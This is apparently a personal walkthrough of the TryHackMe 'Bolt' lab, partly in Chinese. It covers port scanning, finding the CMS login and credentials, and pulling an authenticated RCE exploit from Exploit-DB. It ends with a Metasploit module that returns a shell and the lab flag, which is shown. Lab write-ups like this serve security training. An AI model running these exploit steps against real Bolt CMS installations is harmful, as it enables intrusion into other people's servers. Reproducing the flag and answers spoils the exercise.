URL : https://tryhackme.com/room/bolt
IP : 10.10.51.13
Recon
rustscan -a 10.10.51.13
- 發現有開
- 22
- 80
- 8000
nmap -A -p22,80,8000 10.10.51.13- 觀察網頁
- 80
- 8080
- 80
- What port number has a web server with a CMS running?
- 8000
- What is the username we can find in the CMS?
bolt
- What is the password we can find for the username?
boltadmin123
python3 dirsearch.py -u http://10.10.51.13:8000/ -e allhttp://10.10.51.13:8000/.htaccess- 裡面沒什麼特別
- 網路上找到後臺網址
- http://10.10.51.13:8000/bolt/login
- What version of the CMS is installed on the server? (Ex: Name 1.1.1)
Bolt 3.7.1- 上一張截圖最下面有寫
- Google
Bolt 3.7.1 Exploit- https://www.exploit-db.com/exploits/48296
wget https://www.exploit-db.com/download/48296 -O 48296.py
- There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?
- 48296
- 不知道為什麼,我 run 起來失敗QQ
- 網路上找到另外一組 exploit
- https://medium.com/@foxsin34/bolt-cms-3-7-1-authenticated-rce-remote-code-execution-ed781e03237b
- 他莫名的把我的密碼改成
password了 - 但是也沒有用 ?__?
- 改用 msf
search bolt- 找到了第 0 個 RCE 的
use 0set PASSWORD passwordset USERNAME boltset RHOSTS 10.10.51.13set LHOST tun0show options
exploit- 成功 RCE 取得 flag
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
